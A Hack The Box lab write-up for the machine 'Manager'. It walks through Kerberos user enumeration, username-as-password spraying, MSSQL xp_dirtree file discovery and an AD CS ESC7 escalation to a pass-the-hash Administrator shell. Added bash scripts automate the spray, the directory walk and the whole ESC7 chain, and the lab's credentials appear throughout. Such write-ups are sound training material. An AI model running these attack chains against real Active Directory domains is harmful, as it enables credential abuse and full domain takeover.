In today’s blog post we will be going over Manager, an HTB machine. Let’s get started, enjoy!
1) I started off with an enumeration of the open ports using Nmap:
nmap -sC -sV -A -T4 <TARGET_IP>
2) From here I right away tried an SMB null session, RPC enumeration and LDAP enumeration, but none of that worked.
2.1) Since port 88 is open, Kerbrute is a nice way of enumerating valid users on the remote host:
kerbrute userenum -d <DOMAIN> /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>
2.2) While Kerbrute is running, let’s enumerate the website.
2.2.1) I performed directory busting with dirsearch and ffuf and didn’t find any interesting directories. I also performed subdomain enumeration with ffuf, but again nothing interesting.
2.2.2) One interesting thing I found on the website is an image on the home page pointing at a note on a table. I downloaded the image and looked for anything hidden in it, but with no success either.
3) Microsoft SQL Server is running as well, so I tried default credentials with sqsh just in case, but that didn’t work out either:
sqsh -S <target-ip> -U username -P password
4) At this point Kerbrute had found about a dozen usernames, but I don’t have a password. The only thing left to try is the username as the password. I decided to do password spraying with CrackMapExec. First, save the found usernames to users.txt:
Then run crackmapexec so that each user is tried only against its own name as the password (--no-bruteforce pairs line N of the user list with line N of the password list instead of the full cross product, so each account sees at most one failed logon, which matters with a lockout policy; --continue-on-success keeps spraying after the first hit):
crackmapexec smb 10.10.11.236 -u users.txt -p users.txt -d manager.htb --no-bruteforce --continue-on-success
Bingo, we got one hit:
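As an added example (not code from the original post), here is a small bash helper for exactly this step: it turns Kerbrute’s userenum output into users.txt and wraps the one-attempt-per-account spray with CrackMapExec. The kerbrute lines and account names in the sample are constructed for the demo, the "[+] VALID USERNAME:" line format is what current kerbrute prints, and the spray function is only defined, not executed, since it needs the live DC.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: kerbrute output -> users.txt ->
# one "username as password" attempt per account with crackmapexec.
set -eu

# extract_users: read kerbrute userenum output on stdin and print the bare
# usernames, lowercased and de-duplicated, in the order they were found.
extract_users() {
    awk '/VALID USERNAME:/ {
             u = $NF            # last field is user@realm
             sub(/@.*/, "", u)  # drop the realm
             u = tolower(u)
             if (!(u in seen)) { seen[u] = 1; print u }
         }'
}

# spray_user_as_password USERS DOMAIN DC: one logon attempt per account.
# --no-bruteforce pairs line N of -u with line N of -p instead of trying the
# full cross product, so each account sees at most one failed logon (this is
# what keeps the spray under a lockout threshold); --continue-on-success keeps
# going after the first hit. Defined only; call it against a live DC.
spray_user_as_password() {
    users="$1"; domain="$2"; dc="$3"
    crackmapexec smb "$dc" -d "$domain" -u "$users" -p "$users" \
        --no-bruteforce --continue-on-success
}

# Constructed sample of kerbrute userenum output (names made up; the mixed
# case duplicate shows why we normalise before spraying).
sample_kerbrute_output() {
    cat <<'EOF'
2023/10/22 12:00:01 >  Using KDC(s):
2023/10/22 12:00:01 >      10.10.11.236:88
2023/10/22 12:00:02 >  [+] VALID USERNAME:   administrator@manager.htb
2023/10/22 12:00:02 >  [+] VALID USERNAME:   Operator@manager.htb
2023/10/22 12:00:03 >  [+] VALID USERNAME:   operator@manager.htb
2023/10/22 12:00:03 >  [+] VALID USERNAME:   raven@manager.htb
2023/10/22 12:00:04 >  Done! Tested 100 usernames (4 valid) in 3.000 seconds
EOF
}

# count_users: how many distinct accounts the sample yields.
count_users() {
    sample_kerbrute_output | extract_users | wc -l | tr -d ' '
}

# Build users.txt from the sample so the rest of the workflow can be seen.
workdir=$(mktemp -d)
users_file="$workdir/users.txt"
sample_kerbrute_output | extract_users > "$users_file"
echo "wrote $(count_users) users to $users_file:"
cat "$users_file"
echo "next: spray_user_as_password $users_file manager.htb 10.10.11.236"
```

Against the real box you would feed the real kerbrute output into extract_users and then call spray_user_as_password with the resulting file; the hit in the post (operator:operator) is exactly the kind of pairing the --no-bruteforce run produces.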
5) Unfortunately this is not enough to get a shell, but we can run ldapdomaindump with these credentials to enumerate the domain further:
sudo ldapdomaindump -u '<domain>\<user>' -p '<password>' <DC_IP>
From the dump we can see that our next target is Raven, as he is a member of Remote Management Users:
6) Back to MS SQL Server: I tried the newly obtained credentials operator:operator with impacket-mssqlclient. (I had some issues with the impacket-mssqlclient version installed on my machine, so I created a Python virtual environment and installed impacket from scratch, after which everything worked fine.)
6.1) python3 -m venv venv
6.2) source venv/bin/activate
6.3)pip3 install impacket
Now we are ready to connect to MS SQL. ### It’s important to pass -windows-auth when we specify a domain, as HackTricks points out: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server ###
python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator@10.10.11.236 -port 1433 -windows-auth
7) From here I thought the intended path was to obtain an NTLMv2 hash by making the SQL server connect back to Responder, which captures the authentication. I followed the steps from HackTricks: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
I was able to capture the NTLMv2 hash from Manager, but I wasn’t able to crack it with Hashcat and rockyou.txt.
7.1) Back to enumeration, to see if we can find something interesting in the database itself.
7.2) I enumerated the database for a while and tried all sorts of things, until I ran the help command in impacket’s mssqlclient and saw that it exposes xp_dirtree, an MSSQL extended stored procedure that lists directories and files on the server’s filesystem: https://exploit-notes.hdks.org/exploit/database/mssql-pentesting/
So I first ran xp_dirtree and from there enumerated every directory separately:
7.3) Until I reached the inetpub directory:
7.4) Here we can see an interesting backup directory that none of the directory busting tools (dirsearch/ffuf) had found:
7.5) So I went back to the website and downloaded the zip file by requesting it directly.
7.6) Inside the zip file is an interesting XML file with an old configuration, which holds credentials for raven.
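Here is the same xp_dirtree technique in script form, as an added example that is not code from the post or from Impacket: it builds xp_dirtree batches that impacket’s mssqlclient can run with its -file option, parses the table mssqlclient prints back into full paths, and queues every subdirectory for the next round so a web root can be walked level by level instead of directory by directory by hand. The listing below is constructed (the real names on the box differ), the exact column alignment of mssqlclient’s table is assumed, and the live walker is only defined since it needs the SQL server.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: drive xp_dirtree from the shell
# to walk a directory tree one level at a time and collect full paths.
set -eu

# build_dirtree_batch DIR...: print one T-SQL xp_dirtree call per directory.
# depth=1 lists only direct children; the third argument (1) asks for files as
# well as subdirectories. The output is suitable for `mssqlclient.py -file`.
build_dirtree_batch() {
    for dir in "$@"; do
        esc=$(printf '%s' "$dir" | sed "s/'/''/g")   # T-SQL doubles quotes
        printf "EXEC master..xp_dirtree '%s', 1, 1;\n" "$esc"
    done
}

# parse_dirtree_table BASE: read the table mssqlclient prints for one
# xp_dirtree call (columns: subdirectory, depth, file) on stdin and emit
# "<kind> <base>\<name>" lines, kind being D for a directory, F for a file.
# The name is everything before the last two numeric columns, so names with
# spaces survive. BASE goes through the environment because awk -v would
# interpret the backslashes in a Windows path.
parse_dirtree_table() {
    BASE="$1" awk '
        BEGIN { base = ENVIRON["BASE"] }
        NF >= 3 && $(NF-1) ~ /^[0-9]+$/ && $NF ~ /^[01]$/ {
            name = $1
            for (i = 2; i <= NF-2; i++) name = name " " $i
            kind = ($NF == 1) ? "F" : "D"
            printf "%s %s\\%s\n", kind, base, name
        }'
}

# Constructed sample of what mssqlclient prints for one directory (names are
# made up for the demo; "old backup" shows the space handling).
sample_wwwroot_listing() {
    cat <<'EOF'
subdirectory    depth   file
------------    -----   ----
css                 1      0
images              1      0
index.html          1      1
old backup          1      0
EOF
}

# walk_with_mssqlclient TARGET ROOT [MAXDEPTH]: breadth-first walk, one
# mssqlclient run per directory, up to MAXDEPTH levels. Assumes impacket's
# mssqlclient.py on PATH and a TARGET like 'manager.htb/operator@10.10.11.236'.
# Defined only; it is not run at load time.
walk_with_mssqlclient() {
    target="$1"; root="$2"; maxdepth="${3:-3}"
    queue=$(mktemp); nextq=$(mktemp); out=$(mktemp); batch=$(mktemp)
    printf '%s\n' "$root" > "$queue"
    level=0
    while [ "$level" -lt "$maxdepth" ] && [ -s "$queue" ]; do
        : > "$nextq"
        while IFS= read -r base; do
            build_dirtree_batch "$base" > "$batch"
            mssqlclient.py "$target" -windows-auth -file "$batch" \
                | parse_dirtree_table "$base" > "$out"
            cat "$out"                            # report everything found
            sed -n 's/^D //p' "$out" >> "$nextq"  # directories go on the queue
        done < "$queue"
        cp "$nextq" "$queue"
        level=$((level + 1))
    done
    rm -f "$queue" "$nextq" "$out" "$batch"
}

# Offline demo of the parser on the constructed listing.
sample_wwwroot_listing | parse_dirtree_table 'C:\inetpub\wwwroot'
```

Because xp_dirtree at depth 1 only returns names, the script has to carry the parent path itself; that is why the walker re-invokes it per directory rather than asking for a deep tree in one call, whose flattened output cannot be turned back into paths reliably.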
7.7) Finally we can get a shell with evil-winrm, and the user.txt flag is ours:
evil-winrm -u raven -p 'R4v3nBe5tD3veloP3r!123' -i 10.10.11.236
8) I ran BloodHound for further enumeration, as well as WinPEAS, but didn’t find any privilege escalation route I could use, until I executed:
whoami /groups
Here we can see an interesting group that we are part of: Certificate Service DCOM Access.
8.1) There are many privilege escalation paths related to Active Directory Certificate Services (AD CS), so let’s see if we can take one. The perfect tool for that is Certipy, which can be found here: https://github.com/ly4k/Certipy. Let’s see what we get with Raven’s creds:
### Just a quick note: I had some problems with the Certipy version already installed on my virtual machine, so I installed the stable release in a Python virtual environment ###
1)python3 -m venv venv
2)source venv/bin/activate
3)pip3 install certipy-ad
certipy find -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.2) If everything goes well we get three files (.json, .txt and .zip). The .zip and .json are meant for BloodHound, but in this case I will just read the .txt with a simple cat:
Great! Here we can see that Raven holds dangerous rights on the CA itself (ESC7 is about ManageCA / Manage Certificates permissions on the CA rather than a weak template), so the privilege escalation path is ESC7: https://github.com/ly4k/Certipy?tab=readme-ov-file#esc7
8.3) Before we start the attack it’s important to mention that being fast here is crucial because of the server settings:
8.3.1)Let’s add Raven as an officer:
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
### The CA name (manager-DC01-CA) and the DNS name of the CA host (dc01.manager.htb) both come from the certipy find output above ###
8.3.2) Let’s enable the SubCA template:
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.3.3) Let’s request a certificate from SubCA with the Administrator’s UPN:
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
### The request is denied, because only administrators are allowed to enroll in SubCA, but that is fine: answer y when certipy asks whether to save the private key, and note the request ID it prints ###
8.3.4) With the officer right from 8.3.1 we can now issue our own pending request by its request ID:
certipy ca -ca 'manager-DC01-CA' -issue-request <request_id> -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
8.3.5) One last step is to retrieve the issued certificate from the CA with certipy, using the same request ID; this gives us administrator.pfx.
8.3.6) Now we are only one step away from the Administrator’s NT hash, which we can use with evil-winrm to get an interactive shell as Administrator. But:
8.3.7) We now have administrator.pfx, which we can feed back into certipy to authenticate via PKINIT:
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
But there is a weird error about a Kerberos session... Hm...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
9) With some investigating I found out that the problem is usually with the machine itself. Without going into too much detail about the issue, I tried restarting the machine a couple of times and switching VPN connections, but nothing worked. Then I tried Rubeus.exe on the remote host, transferring it together with the admin .pfx, but got the same error again...
9.1) From here I decided to try a Pass-the-Certificate attack over LDAP, following this article: https://arth0s.medium.com/hackthebox-authority-write-up-ebef7cb8a41a, but that approach is not sufficient for the Manager machine.
9.2) Then I spent a lot, A LOT, of time trying to find the root cause of the issue, without any success, until I stumbled upon this comment on the HTB forum:
9.3) So I was right from the very beginning: it was a machine problem. I had to cheat a little here by visiting https://0xdf.gitlab.io/2024/03/16/htb-manager.html# and taking the admin NTLM hash from there, in order to authenticate to the machine and run gpupdate /force.
9.4) Okay, back to our ESC7 AD CS attack. This time I got an error again, but a different one, about time (KRB_AP_ERR_SKEW): my local clock didn’t match the target machine’s clock.
9.5) To fix this, see: https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069
9.6) Now let’s rerun the certipy auth command from step 9.4, and this time we get the hash, finally...
9.7) We can use that hash with evil-winrm (pass-the-hash) and the machine is solved!
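The whole ESC7 chain from sections 8.3 and 9 as one script, as an added example that is not code from the post or from the Certipy project: it captures the request ID from certipy’s output instead of copying it by hand, syncs the clock before touching Kerberos so the KRB_AP_ERR_SKEW detour from 9.4 does not happen, and recognises the KDC_ERR_PADATA_TYPE_NOSUPP error from 8.3.7 instead of trying to parse a hash out of it. Assumptions: ntpdate is installed, certipy prints "Request ID is <n>" and "Got hash for '<upn>': <lm>:<nt>" as Certipy 4.x does, and evil-winrm accepts -H for pass-the-hash. The certipy output samples are constructed (the ID and hash are made up), and run_esc7 is only defined, since it needs the live target.

```shell
#!/usr/bin/env bash
# Added example, not from the original post or Certipy: ESC7 via ManageCA,
# with the request ID parsed from certipy output and the two failure modes
# the post hit (clock skew, PADATA error) handled or detected.
set -eu

DC_IP="10.10.11.236"
DC_HOST="dc01.manager.htb"
CA="manager-DC01-CA"
CREDS_USER="raven@manager.htb"
CREDS_PASS='R4v3nBe5tD3veloP3r!123'
TARGET_UPN="administrator@manager.htb"

# request_id_from_output: pull the numeric request ID out of `certipy req`
# output. The SubCA request is denied (only admins may enroll) but certipy
# still prints "[*] Request ID is <n>", which is all the next steps need.
request_id_from_output() {
    sed -n 's/.*Request ID is \([0-9][0-9]*\).*/\1/p' | head -n 1
}

# nt_hash_from_auth_output: take the NT half of the LM:NT pair that
# `certipy auth` prints as "[*] Got hash for '<upn>': <lm>:<nt>".
nt_hash_from_auth_output() {
    sed -n "s/.*Got hash for '[^']*': [0-9a-f]\{32\}:\([0-9a-f]\{32\}\).*/\1/p" | head -n 1
}

# is_padata_error: true when certipy auth hit KDC_ERR_PADATA_TYPE_NOSUPP,
# i.e. the DC is not offering PKINIT (on the box a gpupdate /force as a local
# admin is what fixed it, see section 9.3).
is_padata_error() {
    grep -q 'KDC_ERR_PADATA_TYPE_NOSUPP'
}

run_esc7() {
    # Kerberos tolerates about 5 minutes of skew; sync to the DC first (9.4).
    # ntpdate is assumed to be installed; any NTP client that sets the clock works.
    sudo ntpdate -u "$DC_IP"

    # 8.3.1 / 8.3.2: abuse ManageCA to make raven an officer and enable SubCA.
    certipy ca -ca "$CA" -add-officer raven -username "$CREDS_USER" -password "$CREDS_PASS" -dc-ip "$DC_IP"
    certipy ca -ca "$CA" -enable-template SubCA -username "$CREDS_USER" -password "$CREDS_PASS" -dc-ip "$DC_IP"

    # 8.3.3: request; expected to be denied. Answer y to "save the private
    # key?" (the key is needed to build the pfx later) and keep the request ID.
    req_out=$(printf 'y\n' | certipy req -username "$CREDS_USER" -password "$CREDS_PASS" \
                  -ca "$CA" -target "$DC_HOST" -template SubCA -upn "$TARGET_UPN" \
                  -dc-ip "$DC_IP" 2>&1 || true)
    req_id=$(printf '%s\n' "$req_out" | request_id_from_output)
    [ -n "$req_id" ] || { echo "no request ID in certipy output" >&2; return 1; }

    # 8.3.4: approve our own pending request with the officer right.
    certipy ca -ca "$CA" -issue-request "$req_id" -username "$CREDS_USER" -password "$CREDS_PASS" -dc-ip "$DC_IP"

    # 8.3.5: retrieve the issued certificate; certipy writes administrator.pfx.
    certipy req -username "$CREDS_USER" -password "$CREDS_PASS" -ca "$CA" -target "$DC_HOST" \
        -retrieve "$req_id" -dc-ip "$DC_IP"

    # 8.3.7 / 9.6: PKINIT with the certificate, then unpack the NT hash.
    auth_out=$(certipy auth -pfx administrator.pfx -dc-ip "$DC_IP" 2>&1 || true)
    if printf '%s\n' "$auth_out" | is_padata_error; then
        echo "DC refused PKINIT (KDC_ERR_PADATA_TYPE_NOSUPP); see section 9" >&2
        return 1
    fi
    nt=$(printf '%s\n' "$auth_out" | nt_hash_from_auth_output)
    [ -n "$nt" ] || { echo "no NT hash in certipy auth output" >&2; return 1; }
    evil-winrm -i "$DC_IP" -u administrator -H "$nt"
}

# Constructed certipy output used to exercise the parsers offline
# (the request ID and the hash are made up).
sample_req_output() {
    cat <<'EOF'
[*] Requesting certificate via RPC
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 42
Would you like to save the private key? (y/N)
EOF
}
sample_auth_output() {
    cat <<'EOF'
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef
EOF
}
sample_padata_output() {
    cat <<'EOF'
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
EOF
}

# Offline demo of the parsing only; call run_esc7 against a live target.
echo "request id: $(sample_req_output | request_id_from_output)"
echo "nt hash:    $(sample_auth_output | nt_hash_from_auth_output)"
```

The point of scripting it is speed: the officer right and the SubCA template are the things that get reverted on this box, so the request, issue and retrieve steps want to run back to back rather than with a copy-paste pause between them.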
Lessons Learned
1) Brute force is sometimes the only way in. I usually forget about it because I assume it is not the intended path, but sometimes it is. Here we were stuck with a bunch of usernames from Kerbrute and nothing else, so we sprayed them with CrackMapExec using each username as its own password, and got lucky!
2) Having access to MS SQL Server on an AD machine doesn’t necessarily mean the attack vector is capturing an NTLMv2 hash with Responder and cracking it. With this machine I learned a lot about xp_dirtree, the MSSQL extended stored procedure (exposed as a helper in impacket’s mssqlclient) that lists files on the remote host, which let us find the hidden directory on the web server.
3) Finally, I learned about the AD CS ESC7 attack vector for privilege escalation and a few more tricks with Certipy. All in all, a great machine and an amazing experience!